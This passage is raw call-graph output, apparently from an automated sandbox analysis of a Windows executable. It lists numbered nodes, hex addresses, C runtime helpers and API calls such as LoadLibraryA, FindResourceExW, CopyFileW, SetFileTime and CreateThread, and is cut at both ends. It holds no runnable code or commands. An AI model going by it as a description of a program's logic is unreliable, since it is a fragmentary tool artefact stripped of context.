94276->94292 94279 321dfc __wsplitpath 47 API calls 94285 34c088 _wcscat _wcscpy 94279->94285 94280 3044ed 64 API calls 94281 34c12c 94280->94281 94283 3044ed 64 API calls 94281->94283 94282 34c110 94282->93904 94284 34c13c 94283->94284 94286 3044ed 64 API calls 94284->94286 94287 321dfc __wsplitpath 47 API calls 94285->94287 94288 34c157 94286->94288 94287->94292 94289 3044ed 64 API calls 94288->94289 94290 34c167 94289->94290 94291 3044ed 64 API calls 94290->94291 94293 34c182 94291->94293 94292->94280 94292->94282 94294 3044ed 64 API calls 94293->94294 94295 34c192 94294->94295 94296 3044ed 64 API calls 94295->94296 94297 34c1a2 94296->94297 94298 3044ed 64 API calls 94297->94298 94299 34c1b2 94298->94299 94797 34c71a GetTempPathW GetTempFileNameW 94299->94797 94301 34c1be 94302 323499 117 API calls 94301->94302 94304 34c1cf 94302->94304 94303 3235e4 __fcloseall 83 API calls 94305 34c294 94303->94305 94304->94282 94306 3044ed 64 API calls 94304->94306 94314 34c289 94304->94314 94798 322aae 94304->94798 94305->94282 94307 34c342 CopyFileW 94305->94307 94310 34c2b8 94305->94310 94306->94304 94308 34c358 94307->94308 94309 34c32d 94307->94309 94308->94282 94309->94282 94811 34c6d9 CreateFileW 94309->94811 94820 34b965 94310->94820 94314->94303 94315->93867 94316->93889 94317->93895 94367 304339 94318->94367 94321 30423c 94323 304244 FreeLibrary 94321->94323 94324 3041bb 94321->94324 94323->94324 94325 323499 94324->94325 94375 3234ae 94325->94375 94327 3041c8 94327->94236 94327->94237 94531 3042e4 94328->94531 94332 3042c1 FreeLibrary 94333 3041ec 94332->94333 94335 304380 94333->94335 94334 3042b8 94334->94332 94334->94333 94336 31f4ea 48 API calls 94335->94336 94337 304395 94336->94337 94338 3047b7 48 API calls 94337->94338 94339 3043a1 _memcpy_s 94338->94339 94340 3044d1 94339->94340 94341 304499 94339->94341 94345 3043dc 94339->94345 94550 34c750 93 API calls 94340->94550 94539 30406b CreateStreamOnHGlobal 94341->94539 94342 304950 57 API calls 94350 3043e5 94342->94350 94345->94342 94346 3044ed 64 API calls 94346->94350 94347 304479 94347->94244 94349 374ed7 94351 304517 83 API calls 94349->94351 94350->94346 94350->94347 94350->94349 94545 304517 94350->94545 94352 374eeb 94351->94352 94353 3044ed 64 API calls 94352->94353 94353->94347 94355 374fc0 94354->94355 94356 3044ff 94354->94356 94568 32381e 94356->94568 94359 34bf5a 94748 34bdb4 94359->94748 94361 34bf70 94361->94252 94363 375002 94362->94363 94364 30495f 94362->94364 94753 323e65 94364->94753 94366 304967 94371 30434b 94367->94371 94370 304321 LoadLibraryA GetProcAddress 94370->94321 94372 30422f 94371->94372 94373 304354 LoadLibraryA 94371->94373 94372->94321 94372->94370 94373->94372 94374 304365 GetProcAddress 94373->94374 94374->94372 94377 3234ba __fcloseall 94375->94377 94376 3234cd 94423 327c0e 47 API calls __getptd_noexit 94376->94423 94377->94376 94379 3234fe 94377->94379 94394 32e4c8 94379->94394 94380 3234d2 94424 326e10 8 API calls __controlfp_s 94380->94424 94383 323503 94384 323519 94383->94384 94385 32350c 94383->94385 94387 323543 94384->94387 94388 323523 94384->94388 94425 327c0e 47 API calls __getptd_noexit 94385->94425 94408 32e5e0 94387->94408 94426 327c0e 47 API calls __getptd_noexit 94388->94426 94390 3234dd __fcloseall @_EH4_CallFilterFunc@8 94390->94327 94395 32e4d4 __fcloseall 94394->94395 94396 327cf4 __lock 47 API calls 94395->94396 94406 32e4e2 94396->94406 94397 32e559 94433 3269d0 47 API calls _W_store_winword 94397->94433 94398 32e552 94428 32e5d7 94398->94428 94401 32e560 94401->94398 94403 32e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94401->94403 94402 32e5cc __fcloseall 94402->94383 94403->94398 94404 327d7c __mtinitlocknum 47 API calls 94404->94406 94406->94397 94406->94398 94406->94404 94431 324e5b 48 API calls __lock 94406->94431 94432 324ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94406->94432 94416 32e600 __wopenfile 94408->94416 94409 32e61a 94438 327c0e 47 API calls __getptd_noexit 94409->94438 94411 32e7d5 94411->94409 94415 32e838 94411->94415 94412 32e61f 94439 326e10 8 API calls __controlfp_s 94412->94439 94414 32354e 94427 323570 LeaveCriticalSection LeaveCriticalSection _fseek 94414->94427 94435 3363c9 94415->94435 94416->94409 94416->94411 94440 32185b 59 API calls 2 library calls 94416->94440 94419 32e7ce 94419->94411 94441 32185b 59 API calls 2 library calls 94419->94441 94421 32e7ed 94421->94411 94442 32185b 59 API calls 2 library calls 94421->94442 94423->94380 94424->94390 94425->94390 94426->94390 94427->94390 94434 327e58 LeaveCriticalSection 94428->94434 94430 32e5de 94430->94402 94431->94406 94432->94406 94433->94401 94434->94430 94443 335bb1 94435->94443 94437 3363e2 94437->94414 94438->94412 94439->94414 94440->94419 94441->94421 94442->94411 94444 335bbd __fcloseall 94443->94444 94445 335bcf 94444->94445 94448 335c06 94444->94448 94528 327c0e 47 API calls __getptd_noexit 94445->94528 94447 335bd4 94529 326e10 8 API calls __controlfp_s 94447->94529 94454 335c78 94448->94454 94451 335c23 94530 335c4c LeaveCriticalSection __unlock_fhandle 94451->94530 94453 335bde __fcloseall 94453->94437 94455 335c98 94454->94455 94456 32273b __wsopen_helper 47 API calls 94455->94456 94459 335cb4 94456->94459 94457 326e20 __invoke_watson 8 API calls 94458 3363c8 94457->94458 94461 335bb1 __wsopen_helper 104 API calls 94458->94461 94460 335cee 94459->94460 94472 335d11 94459->94472 94477 335deb 94459->94477 94462 327bda __set_osfhnd 47 API calls 94460->94462 94463 3363e2 94461->94463 94464 335cf3 94462->94464 94463->94451 94465 327c0e __controlfp_s 47 API calls 94464->94465 94466 335d00 94465->94466 94468 326e10 __controlfp_s 8 API calls 94466->94468 94467 335dcf 94469 327bda __set_osfhnd 47 API calls 94467->94469 94470 335d0a 94468->94470 94471 335dd4 94469->94471 94470->94451 94473 327c0e __controlfp_s 47 API calls 94471->94473 94472->94467 94474 335dad 94472->94474 94475 335de1 94473->94475 94478 32a979 __wsopen_helper 52 API calls 94474->94478 94476 326e10 __controlfp_s 8 API calls 94475->94476 94476->94477 94477->94457 94479 335e7b 94478->94479 94480 335ea6 94479->94480 94481 335e85 94479->94481 94483 335b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94480->94483 94482 327bda __set_osfhnd 47 API calls 94481->94482 94484 335e8a 94482->94484 94494 335ec8 94483->94494 94485 327c0e __controlfp_s 47 API calls 94484->94485 94487 335e94 94485->94487 94486 335f46 GetFileType 94488 335f93 94486->94488 94489 335f51 GetLastError 94486->94489 94492 327c0e __controlfp_s 47 API calls 94487->94492 94498 32ac0b __set_osfhnd 48 API calls 94488->94498 94493 327bed __dosmaperr 47 API calls 94489->94493 94490 335f14 GetLastError 94491 327bed __dosmaperr 47 API calls 94490->94491 94495 335f39 94491->94495 94492->94470 94496 335f78 CloseHandle 94493->94496 94494->94486 94494->94490 94497 335b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94494->94497 94501 327c0e __controlfp_s 47 API calls 94495->94501 94496->94495 94499 335f86 94496->94499 94500 335f09 94497->94500 94505 335fb1 94498->94505 94502 327c0e __controlfp_s 47 API calls 94499->94502 94500->94486 94500->94490 94501->94477 94503 335f8b 94502->94503 94503->94495 94504 33616c 94504->94477 94507 33633f CloseHandle 94504->94507 94505->94504 94506 32f82f __lseeki64_nolock 49 API calls 94505->94506 94525 336032 94505->94525 94508 33601b 94506->94508 94509 335b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94507->94509 94511 327bda __set_osfhnd 47 API calls 94508->94511 94508->94525 94510 336366 94509->94510 94512 33639a 94510->94512 94513 33636e GetLastError 94510->94513 94511->94525 94512->94477 94514 327bed __dosmaperr 47 API calls 94513->94514 94516 33637a 94514->94516 94515 336064 94519 336f40 __chsize_nolock 81 API calls 94515->94519 94515->94525 94520 32ab1e __free_osfhnd 48 API calls 94516->94520 94517 32ee0e 59 API calls __wsopen_helper 94517->94525 94518 32ea9c __close_nolock 50 API calls 94518->94525 94519->94515 94520->94512 94521 32af61 __flswbuf 78 API calls 94521->94525 94522 3361e9 94524 32ea9c __close_nolock 50 API calls 94522->94524 94523 32f82f 49 API calls __lseeki64_nolock 94523->94525 94526 3361f0 94524->94526 94525->94504 94525->94515 94525->94517 94525->94518 94525->94521 94525->94522 94525->94523 94527 327c0e __controlfp_s 47 API calls 94526->94527 94527->94477 94528->94447 94529->94453 94530->94453 94535 3042f6 94531->94535 94534 3042cc LoadLibraryA GetProcAddress 94534->94334 94536 3042aa 94535->94536 94537 3042ff LoadLibraryA 94535->94537 94536->94334 94536->94534 94537->94536 94538 304310 GetProcAddress 94537->94538 94538->94536 94540 304085 FindResourceExW 94539->94540 94542 3040a2 94539->94542 94541 374f16 LoadResource 94540->94541 94540->94542 94541->94542 94543 374f2b SizeofResource 94541->94543 94542->94345 94543->94542 94544 374f3f LockResource 94543->94544 94544->94542 94546 304526 94545->94546 94549 374fe0 94545->94549 94551 323a8d 94546->94551 94548 304534 94548->94350 94550->94345 94552 323a99 __fcloseall 94551->94552 94553 323aa7 94552->94553 94554 323acd 94552->94554 94564 327c0e 47 API calls __getptd_noexit 94553->94564 94557 324e1c __lock_file 48 API calls 94554->94557 94556 323aac 94565 326e10 8 API calls __controlfp_s 94556->94565 94559 323ad3 94557->94559 94566 3239fe 81 API calls 5 library calls 94559->94566 94561 323ae2 94567 323b04 LeaveCriticalSection LeaveCriticalSection _fseek 94561->94567 94563 323ab7 __fcloseall 94563->94548 94564->94556 94565->94563 94566->94561 94567->94563 94571 323839 94568->94571 94570 304510 94570->94359 94572 323845 __fcloseall 94571->94572 94573 323888 94572->94573 94574 323880 __fcloseall 94572->94574 94575 32385b _memset 94572->94575 94576 324e1c __lock_file 48 API calls 94573->94576 94574->94570 94598 327c0e 47 API calls __getptd_noexit 94575->94598 94578 32388e 94576->94578 94584 32365b 94578->94584 94580 323875 94599 326e10 8 API calls __controlfp_s 94580->94599 94587 323676 _memset 94584->94587 94591 323691 94584->94591 94585 323681 94692 327c0e 47 API calls __getptd_noexit 94585->94692 94587->94585 94589 3236cf 94587->94589 94587->94591 94589->94591 94592 3237e0 _memset 94589->94592 94593 322933 __stbuf 47 API calls 94589->94593 94601 32ee0e 94589->94601 94672 32eb66 94589->94672 94694 32ec87 47 API calls 3 library calls 94589->94694 94600 3238c2 LeaveCriticalSection LeaveCriticalSection _fseek 94591->94600 94695 327c0e 47 API calls __getptd_noexit 94592->94695 94593->94589 94597 323686 94693 326e10 8 API calls __controlfp_s 94597->94693 94598->94580 94599->94574 94600->94574 94602 32ee46 94601->94602 94603 32ee2f 94601->94603 94605 32f57e 94602->94605 94609 32ee80 94602->94609 94696 327bda 47 API calls __getptd_noexit 94603->94696 94712 327bda 47 API calls __getptd_noexit 94605->94712 94606 32ee34 94697 327c0e 47 API calls __getptd_noexit 94606->94697 94611 32ee88 94609->94611 94618 32ee9f 94609->94618 94610 32f583 94713 327c0e 47 API calls __getptd_noexit 94610->94713 94698 327bda 47 API calls __getptd_noexit 94611->94698 94614 32ee94 94714 326e10 8 API calls __controlfp_s 94614->94714 94615 32ee8d 94699 327c0e 47 API calls __getptd_noexit 94615->94699 94617 32eeb4 94700 327bda 47 API calls __getptd_noexit 94617->94700 94618->94617 94620 32eece 94618->94620 94622 32eeec 94618->94622 94652 32ee3b 94618->94652 94620->94617 94626 32eed9 94620->94626 94701 3269d0 47 API calls _W_store_winword 94622->94701 94625 333bf2 __stbuf 47 API calls 94628 32efed 94625->94628 94626->94625 94627 32eefc 94629 32ef04 94627->94629 94630 32ef1f 94627->94630 94632 32f066 ReadFile 94628->94632 94637 32f003 GetConsoleMode 94628->94637 94702 327c0e 47 API calls __getptd_noexit 94629->94702 94704 32f82f 49 API calls 3 library calls 94630->94704 94635 32f546 GetLastError 94632->94635 94636 32f088 94632->94636 94634 32ef09 94703 327bda 47 API calls __getptd_noexit 94634->94703 94640 32f553 94635->94640 94641 32f046 94635->94641 94636->94635 94646 32f058 94636->94646 94642 32f063 94637->94642 94643 32f017 94637->94643 94638 32ef2d 94638->94626 94710 327c0e 47 API calls __getptd_noexit 94640->94710 94654 32f04c 94641->94654 94705 327bed 47 API calls 3 library calls 94641->94705 94642->94632 94643->94642 94647 32f01d ReadConsoleW 94643->94647 94644 32ef14 94644->94652 94646->94654 94655 32f0bd 94646->94655 94662 32f32a 94646->94662 94647->94646 94649 32f040 GetLastError 94647->94649 94648 32f558 94711 327bda 47 API calls __getptd_noexit 94648->94711 94649->94641 94652->94589 94653 321c9d _free 47 API calls 94653->94652 94654->94652 94654->94653 94657 32f129 ReadFile 94655->94657 94663 32f1aa 94655->94663 94658 32f14a GetLastError 94657->94658 94671 32f154 94657->94671 94658->94671 94659 32f267 94666 32f217 MultiByteToWideChar 94659->94666 94708 32f82f 49 API calls 3 library calls 94659->94708 94660 32f257 94707 327c0e 47 API calls __getptd_noexit 94660->94707 94661 32f430 ReadFile 94665 32f453 GetLastError 94661->94665 94670 32f461 94661->94670 94662->94654 94662->94661 94663->94654 94663->94659 94663->94660 94663->94666 94665->94670 94666->94649 94666->94654 94670->94662 94709 32f82f 49 API calls 3 library calls 94670->94709 94671->94655 94706 32f82f 49 API calls 3 library calls 94671->94706 94673 32eb71 94672->94673 94677 32eb86 94672->94677 94745 327c0e 47 API calls __getptd_noexit 94673->94745 94675 32eb76 94746 326e10 8 API calls __controlfp_s 94675->94746 94678 32ebbb 94677->94678 94684 32eb81 94677->94684 94747 333e24 47 API calls __malloc_crt 94677->94747 94680 322933 __stbuf 47 API calls 94678->94680 94681 32ebcf 94680->94681 94715 32ed06 94681->94715 94683 32ebd6 94683->94684 94685 322933 __stbuf 47 API calls 94683->94685 94684->94589 94686 32ebf9 94685->94686 94686->94684 94687 322933 __stbuf 47 API calls 94686->94687 94688 32ec05 94687->94688 94688->94684 94689 322933 __stbuf 47 API calls 94688->94689 94690 32ec12 94689->94690 94691 322933 __stbuf 47 API calls 94690->94691 94691->94684 94692->94597 94693->94591 94694->94589 94695->94597 94696->94606 94697->94652 94698->94615 94699->94614 94700->94615 94701->94627 94702->94634 94703->94644 94704->94638 94705->94654 94706->94671 94707->94654 94708->94666 94709->94670 94710->94648 94711->94654 94712->94610 94713->94614 94714->94652 94716 32ed12 __fcloseall 94715->94716 94717 32ed32 94716->94717 94718 32ed1a 94716->94718 94720 32eded 94717->94720 94724 32ed68 94717->94724 94719 327bda __set_osfhnd 47 API calls 94718->94719 94721 32ed1f 94719->94721 94722 327bda __set_osfhnd 47 API calls 94720->94722 94723 327c0e __controlfp_s 47 API calls 94721->94723 94725 32edf2 94722->94725 94737 32ed27 __fcloseall 94723->94737 94727 32ed75 94724->94727 94728 32ed8a 94724->94728 94726 327c0e __controlfp_s 47 API calls 94725->94726 94730 32ed82 94726->94730 94731 327bda __set_osfhnd 47 API calls 94727->94731 94729 32a8ed ___lock_fhandle 49 API calls 94728->94729 94732 32ed90 94729->94732 94736 326e10 __controlfp_s 8 API calls 94730->94736 94733 32ed7a 94731->94733 94734 32eda3 94732->94734 94735 32edb6 94732->94735 94738 327c0e __controlfp_s 47 API calls 94733->94738 94739 32ee0e __wsopen_helper 59 API calls 94734->94739 94740 327c0e __controlfp_s 47 API calls 94735->94740 94736->94737 94737->94683 94738->94730 94741 32edaf 94739->94741 94742 32edbb 94740->94742 94744 32ede5 __filbuf LeaveCriticalSection 94741->94744 94743 327bda __set_osfhnd 47 API calls 94742->94743 94743->94741 94744->94737 94745->94675 94746->94684 94747->94678 94751 32344a GetSystemTimeAsFileTime 94748->94751 94750 34bdc3 94750->94361 94752 323478 __aulldiv 94751->94752 94752->94750 94754 323e71 __fcloseall 94753->94754 94755 323e94 94754->94755 94756 323e7f 94754->94756 94758 324e1c __lock_file 48 API calls 94755->94758 94767 327c0e 47 API calls __getptd_noexit 94756->94767 94760 323e9a 94758->94760 94759 323e84 94768 326e10 8 API calls __controlfp_s 94759->94768 94769 323b0c 55 API calls 6 library calls 94760->94769 94763 323ea5 94770 323ec5 LeaveCriticalSection LeaveCriticalSection _fseek 94763->94770 94765 323eb7 94766 323e8f __fcloseall 94765->94766 94766->94366 94767->94759 94768->94766 94769->94763 94770->94765 94772 321e61 94771->94772 94775 321e55 94771->94775 94795 327c0e 47 API calls __getptd_noexit 94772->94795 94774 322019 94780 321e41 94774->94780 94796 326e10 8 API calls __controlfp_s 94774->94796 94775->94772 94782 321ed4 94775->94782 94790 329d6b 47 API calls __controlfp_s 94775->94790 94778 321fa0 94778->94772 94778->94780 94783 321fb0 94778->94783 94779 321f5f 94779->94772 94781 321f7b 94779->94781 94792 329d6b 47 API calls __controlfp_s 94779->94792 94780->93890 94781->94772 94781->94780 94786 321f91 94781->94786 94782->94772 94789 321f41 94782->94789 94791 329d6b 47 API calls __controlfp_s 94782->94791 94794 329d6b 47 API calls __controlfp_s 94783->94794 94793 329d6b 47 API calls __controlfp_s 94786->94793 94789->94778 94789->94779 94790->94782 94791->94789 94792->94781 94793->94780 94794->94780 94795->94774 94796->94780 94797->94301 94799 322aba __fcloseall 94798->94799 94800 322ad4 94799->94800 94801 322aec 94799->94801 94803 322ae4 __fcloseall 94799->94803 94863 327c0e 47 API calls __getptd_noexit 94800->94863 94804 324e1c __lock_file 48 API calls 94801->94804 94803->94304 94806 322af2 94804->94806 94805 322ad9 94864 326e10 8 API calls __controlfp_s 94805->94864 94851 322957 94806->94851 94812 34c715 94811->94812 94813 34c6ff SetFileTime CloseHandle 94811->94813 94812->94282 94813->94812 94819 34c581 __tzset_nolock _wcscmp 94814->94819 94815 3044ed 64 API calls 94815->94819 94816 34c05f 94816->94279 94816->94282 94817 34bf5a GetSystemTimeAsFileTime 94817->94819 94818 304517 83 API calls 94818->94819 94819->94815 94819->94816 94819->94817 94819->94818 94821 34b970 94820->94821 94822 34b97e 94820->94822 94823 323499 117 API calls 94821->94823 94824 34b9c3 94822->94824 94825 323499 117 API calls 94822->94825 94835 34b987 94822->94835 94823->94822 94869 34bbe8 94824->94869 94826 34b9a8 94825->94826 94826->94824 94828 34b9b1 94826->94828 94832 3235e4 __fcloseall 83 API calls 94828->94832 94828->94835 94829 34ba07 94830 34ba2c 94829->94830 94831 34ba0b 94829->94831 94873 34b7e5 94830->94873 94834 34ba18 94831->94834 94837 3235e4 __fcloseall 83 API calls 94831->94837 94832->94835 94834->94835 94838 3235e4 __fcloseall 83 API calls 94834->94838 94835->94309 94837->94834 94838->94835 94839 34ba5a 94882 34ba8a 94839->94882 94841 34ba3a 94842 34ba47 94841->94842 94844 3235e4 __fcloseall 83 API calls 94841->94844 94842->94835 94846 3235e4 __fcloseall 83 API calls 94842->94846 94844->94842 94846->94835 94848 34ba75 94848->94835 94850 3235e4 __fcloseall 83 API calls 94848->94850 94849 3235e4 __fcloseall 83 API calls 94849->94848 94850->94835 94853 322966 94851->94853 94858 322984 94851->94858 94852 322974 94866 327c0e 47 API calls __getptd_noexit 94852->94866 94853->94852 94853->94858 94861 32299c _memcpy_s 94853->94861 94855 322979 94867 326e10 8 API calls __controlfp_s 94855->94867 94865 322b24 LeaveCriticalSection LeaveCriticalSection _fseek 94858->94865 94859 322c84 __flush 78 API calls 94859->94861 94860 322933 __stbuf 47 API calls 94860->94861 94861->94858 94861->94859 94861->94860 94862 32af61 __flswbuf 78 API calls 94861->94862 94868 328e63 78 API calls 5 library calls 94861->94868 94862->94861 94863->94805 94864->94803 94865->94803 94866->94855 94867->94858 94868->94861 94870 34bbf6 _memcpy_s __tzset_nolock 94869->94870 94871 34bc0d 94869->94871 94870->94829 94872 32381e __fread_nolock 64 API calls 94871->94872 94872->94870 94874 32395c _W_store_winword 47 API calls 94873->94874 94875 34b7f4 94874->94875 94876 32395c _W_store_winword 47 API calls 94875->94876 94877 34b808 94876->94877 94878 32395c _W_store_winword 47 API calls 94877->94878 94879 34b81c 94878->94879 94880 34bb64 47 API calls 94879->94880 94881 34b82f 94879->94881 94880->94881 94881->94839 94881->94841 94888 34baa0 94882->94888 94883 34bb51 94902 34bd8a 94883->94902 94884 34b841 64 API calls 94884->94888 94886 34ba61 94890 34bb64 94886->94890 94888->94883 94888->94884 94888->94886 94898 34bc67 94888->94898 94906 34b942 64 API calls 94888->94906 94891 34bb71 94890->94891 94892 34bb77 94890->94892 94893 321c9d _free 47 API calls 94891->94893 94894 321c9d _free 47 API calls 94892->94894 94897 34bb88 94892->94897 94893->94892 94894->94897 94895 34ba68 94895->94848 94895->94849 94896 321c9d _free 47 API calls 94896->94895 94897->94895 94897->94896 94899 34bcb6 94898->94899 94900 34bc76 94898->94900 94899->94900 94907 34bd3d 94899->94907 94900->94888 94900->94900 94903 34bd97 94902->94903 94904 34bda8 94902->94904 94905 322aae 80 API calls 94903->94905 94904->94886 94905->94904 94906->94888 94908 34bd7a 94907->94908 94909 34bd69 94907->94909 94908->94899 94910 322aae 80 API calls 94909->94910 94910->94908 94912 306b0f 48 API calls 94911->94912 94932 30b495 94912->94932 94913 30b69b 94942 30ba85 94913->94942 94915 30b6b5 Mailbox 94915->93910 94918 37397b 94953 3426bc 88 API calls 4 library calls 94918->94953 94921 30b9e4 94954 3426bc 88 API calls 4 library calls 94921->94954 94922 373973 94922->94915 94925 30ba85 48 API calls 94925->94932 94926 373989 94928 30ba85 48 API calls 94926->94928 94927 30bcce 48 API calls 94927->94932 94928->94922 94929 373909 94931 306b4a 48 API calls 94929->94931 94930 30bb85 48 API calls 94930->94932 94933 373914 94931->94933 94932->94913 94932->94918 94932->94921 94932->94925 94932->94927 94932->94929 94932->94930 94935 30bdfa 48 API calls 94932->94935 94938 373939 _memcpy_s 94932->94938 94940 30c413 59 API calls 94932->94940 94941 30bc74 48 API calls 94932->94941 94950 30c6a5 49 API calls 94932->94950 94951 30c799 48 API calls _memcpy_s 94932->94951 94937 31f4ea 48 API calls 94933->94937 94936 30b66c CharUpperBuffW 94935->94936 94936->94932 94937->94938 94952 3426bc 88 API calls 4 library calls 94938->94952 94939->93914 94940->94932 94941->94932 94943 30bb25 94942->94943 94949 30ba98 _memcpy_s 94942->94949 94945 31f4ea 48 API calls 94943->94945 94944 31f4ea 48 API calls 94946 30ba9f 94944->94946 94945->94949 94947 31f4ea 48 API calls 94946->94947 94948 30bac8 94946->94948 94947->94948 94948->94915 94949->94944 94950->94932 94951->94932 94952->94922 94953->94926 94954->94922 94955 37197b 94960 31dd94 94955->94960 94959 37198a 94961 31f4ea 48 API calls 94960->94961 94962 31dd9c 94961->94962 94963 31ddb0 94962->94963 94968 31df3d 94962->94968 94967 320f0a 52 API calls __cinit 94963->94967 94967->94959 94969 31df46 94968->94969 94970 31dda8 94968->94970 95000 320f0a 52 API calls __cinit 94969->95000 94972 31ddc0 94970->94972 94973 30d7f7 48 API calls 94972->94973 94974 31ddd7 GetVersionExW 94973->94974 94975 306a63 48 API calls 94974->94975 94976 31de1a 94975->94976 95001 31dfb4 94976->95001 94979 306571 48 API calls 94982 31de2e 94979->94982 94980 3724c8 94982->94980 95005 31df77 94982->95005 94984 31dea4 GetCurrentProcess 95014 31df5f LoadLibraryA GetProcAddress 94984->95014 94985 31debb 94987 31df31 GetSystemInfo 94985->94987 94988 31dee3 94985->94988 94989 31df0e 94987->94989 95008 31e00c 94988->95008 94991 31df21 94989->94991 94992 31df1c FreeLibrary 94989->94992 94991->94963 94992->94991 94994 31df29 GetSystemInfo 94996 31df03 94994->94996 94995 31def9 95011 31dff4 94995->95011 94996->94989 94998 31df09 FreeLibrary 94996->94998 94998->94989 95000->94970 95002 31dfbd 95001->95002 95003 30b18b 48 API calls 95002->95003 95004 31de22 95003->95004 95004->94979 95015 31df89 95005->95015 95019 31e01e 95008->95019 95012 31e00c 2 API calls 95011->95012 95013 31df01 GetNativeSystemInfo 95012->95013 95013->94996 95014->94985 95016 31dea0 95015->95016 95017 31df92 LoadLibraryA 95015->95017 95016->94984 95016->94985 95017->95016 95018 31dfa3 GetProcAddress 95017->95018 95018->95016 95020 31def1 95019->95020 95021 31e027 LoadLibraryA 95019->95021 95020->94994 95020->94995 95021->95020 95022 31e038 GetProcAddress 95021->95022 95022->95020 95023 3719cb 95028 302322 95023->95028 95025 3719d1 95061 320f0a 52 API calls __cinit 95025->95061 95027 3719db 95029 302344 95028->95029 95062 3026df 95029->95062 95034 30d7f7 48 API calls 95035 302384 95034->95035 95036 30d7f7 48 API calls 95035->95036 95037 30238e 95036->95037 95038 30d7f7 48 API calls 95037->95038 95039 302398 95038->95039 95040 30d7f7 48 API calls 95039->95040 95041 3023de 95040->95041 95042 30d7f7 48 API calls 95041->95042 95043 3024c1 95042->95043 95070 30263f 95043->95070 95047 3024f1 95048 30d7f7 48 API calls 95047->95048 95049 3024fb 95048->95049 95099 302745 95049->95099 95051 302546 95052 302556 GetStdHandle 95051->95052 95053 3025b1 95052->95053 95054 37501d 95052->95054 95055 3025b7 CoInitialize 95053->95055 95054->95053 95056 375026 95054->95056 95055->95025 95106 3492d4 53 API calls 95056->95106 95058 37502d 95107 3499f9 CreateThread 95058->95107 95060 375039 CloseHandle 95060->95055 95061->95027 95108 302854 95062->95108 95065 306a63 48 API calls 95066 30234a 95065->95066 95067 30272e 95066->95067 95122 3027ec 6 API calls 95067->95122 95069 30237a 95069->95034 95071 30d7f7 48 API calls 95070->95071 95072 30264f 95071->95072 95073 30d7f7 48 API calls 95072->95073 95074 302657 95073->95074 95123 3026a7 95074->95123 95077 3026a7 48 API calls 95078 302667 95077->95078 95079 30d7f7 48 API calls 95078->95079 95080 302672 95079->95080 95081 31f4ea 48 API calls 95080->95081 95082 3024cb 95081->95082 95083 3022a4 95082->95083 95084 3022b2 95083->95084 95085 30d7f7 48 API calls 95084->95085 95086 3022bd 95085->95086 95087 30d7f7 48 API calls 95086->95087 95088 3022c8 95087->95088 95089 30d7f7 48 API calls 95088->95089 95090 3022d3 95089->95090 95091 30d7f7 48 API calls 95090->95091 95092 3022de 95091->95092 95093 3026a7 48 API calls 95092->95093 95094 3022e9 95093->95094 95095 31f4ea 48 API calls 95094->95095 95096 3022f0 95095->95096 95097 371fe7 95096->95097 95098 3022f9 RegisterWindowMessageW 95096->95098 95098->95047 95100 302755 95099->95100 95101 375f4d 95099->95101 95102 31f4ea 48 API calls 95100->95102 95128 34c942 50 API calls 95101->95128 95105 30275d 95102->95105 95104 375f58 95105->95051 95106->95058 95107->95060 95129 3499df 54 API calls 95107->95129 95115 302870 95108->95115 95111 302870 48 API calls 95112 302864 95111->95112 95113 30d7f7 48 API calls 95112->95113 95114 302716 95113->95114 95114->95065 95116 30d7f7 48 API calls 95115->95116 95117 30287b 95116->95117 95118 30d7f7 48 API calls 95117->95118 95119 302883 95118->95119 95120 30d7f7 48 API calls 95119->95120 95121 30285c 95120->95121 95121->95111 95122->95069 95124 30d7f7 48 API calls 95123->95124 95125 3026b0 95124->95125 95126 30d7f7 48 API calls 95125->95126 95127 30265f 95126->95127 95127->95077 95128->95104 95130 3719ba 95135 31c75a 95130->95135 95134 3719c9 95136 30d7f7 48 API calls 95135->95136 95137 31c7c8 95136->95137 95143 31d26c 95137->95143 95139 31c865 95140 31c881 95139->95140 95146 31d1fa 48 API calls _memcpy_s 95139->95146 95142 320f0a 52 API calls __cinit 95140->95142 95142->95134 95147 31d298 95143->95147 95146->95139 95148 31d28b 95147->95148 95149 31d2a5 95147->95149 95148->95139 95149->95148 95150 31d2ac RegOpenKeyExW 95149->95150 95150->95148 95151 31d2c6 RegQueryValueExW 95150->95151 95152 31d2e7 95151->95152 95153 31d2fc RegCloseKey 95151->95153 95152->95153 95153->95148 95154 378eb8 95158 34a635 95154->95158 95156 378ec3 95157 34a635 84 API calls 95156->95157 95157->95156 95159 34a66f 95158->95159 95164 34a642 95158->95164 95159->95156 95160 34a671 95170 31ec4e 81 API calls 95160->95170 95162 34a676 95163 30936c 81 API calls 95162->95163 95165 34a67d 95163->95165 95164->95159 95164->95160 95164->95162 95167 34a669 95164->95167 95166 30510d 48 API calls 95165->95166 95166->95159 95169 314525 61 API calls _memcpy_s 95167->95169 95169->95159 95170->95162 95171 325dfd 95172 325e09 __fcloseall 95171->95172 95208 327eeb GetStartupInfoW 95172->95208 95174 325e0e 95210 329ca7 GetProcessHeap 95174->95210 95176 325e66 95177 325e71 95176->95177 95295 325f4d 47 API calls 3 library calls 95176->95295 95211 327b47 95177->95211 95180 325e77 95181 325e82 __RTC_Initialize 95180->95181 95296 325f4d 47 API calls 3 library calls 95180->95296 95232 32acb3 95181->95232 95184 325e91 95185 325e9d GetCommandLineW 95184->95185 95297 325f4d 47 API calls 3 library calls 95184->95297 95251 332e7d GetEnvironmentStringsW 95185->95251 95189 325e9c 95189->95185 95192 325ec2 95264 332cb4 95192->95264 95195 325ec8 95196 325ed3 95195->95196 95299 32115b 47 API calls 3 library calls 95195->95299 95278 321195 95196->95278 95199 325edb 95201 325ee6 __wwincmdln 95199->95201 95300 32115b 47 API calls 3 library calls 95199->95300 95282 303a0f 95201->95282 95203 325efa 95204 325f09 95203->95204 95301 3213f1 47 API calls _doexit 95203->95301 95302 321186 47 API calls _doexit 95204->95302 95207 325f0e __fcloseall 95209 327f01 95208->95209 95209->95174 95210->95176 95303 32123a 30 API calls 2 library calls 95211->95303 95213 327b4c 95304 327e23 InitializeCriticalSectionAndSpinCount 95213->95304 95215 327b51 95216 327b55 95215->95216 95306 327e6d TlsAlloc 95215->95306 95305 327bbd 50 API calls 2 library calls 95216->95305 95219 327b5a 95219->95180 95220 327b67 95220->95216 95221 327b72 95220->95221 95307 326986 95221->95307 95224 327bb4 95315 327bbd 50 API calls 2 library calls 95224->95315 95227 327b93 95227->95224 95229 327b99 95227->95229 95228 